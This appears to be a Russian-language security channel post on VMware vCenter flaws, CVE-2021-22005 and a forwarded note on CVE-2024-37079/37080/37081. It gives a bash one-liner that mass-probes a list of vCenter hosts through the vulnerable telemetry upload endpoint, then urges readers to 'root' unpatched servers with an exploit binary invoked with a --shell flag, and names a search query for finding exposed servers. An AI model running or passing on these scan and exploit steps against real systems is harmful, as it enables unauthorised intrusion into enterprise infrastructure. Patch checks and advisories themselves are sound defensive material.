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Надеюсь все обновились от #VMWare vCenter Server File Upload to #RCE #CVE-2021-22005

как проверить:
cat vmware_centers.txt | while read S do; do curl --connect-timeout 15 --max-time 30 --silent --insecure --user-agent "vAPI/2.100.0 Java/1.8.0_261 (Linux; 4.19.160-6.ph3; amd64)" -X POST "https://$S/analytics/telemetry/ph/api/hyper/send?_c&_i=test" -d "lorem ipsum" -H "Content-Type: application/json" -L --stderr - -v | tac | grep -q "HTTP/1.1 201" && printf "$S \033[1;35mVulnerable\e[0m\n" || printf "$S \033[1;32mPatched\e[0m\n"; done;

Если Ваши админы еще не вразумили - рутуйтесь:
wget; chmod +x

./cve-2021-22005_exp_linux -u https://IP --shell
Forwarded from APT
🔥 VMware vCenter Server RCE + PrivEsc

Multiple heap-overflow vulnerabilities in the implementation of the DCE/RPC protocol. They could allow a bad actor with network access to vCenter Server to achieve remote code execution by sending a specially crafted network packet.

CVE-2024-37079: A heap-overflow vulnerability in the DCERPC protocol implementation of vCenter Server that allows a malicious actor with network access to send specially crafted packets, potentially leading to remote code execution. (CVSS v3.1 score: 9.8 "critical");

CVE-2024-37080: Another heap overflow vulnerability in the DCERPC protocol of vCenter Server. Similar to CVE-2024-37079, it allows an attacker with network access to exploit heap overflow by sending crafted packets, potentially resulting in remote code execution. (CVSS v3.1 score: 9.8 "critical");

CVE-2024-37081: This vulnerability arises from a misconfiguration of sudo in vCenter Server, permitting an authenticated local user to exploit this flaw to elevate their privileges to root on the vCenter Server Appliance. (CVSS v3.1 score: 7.8 "high").

Nuclei Template (PoC):

product:"VMware vCenter Server"


#vmware #vcenter #rce #lpe #cve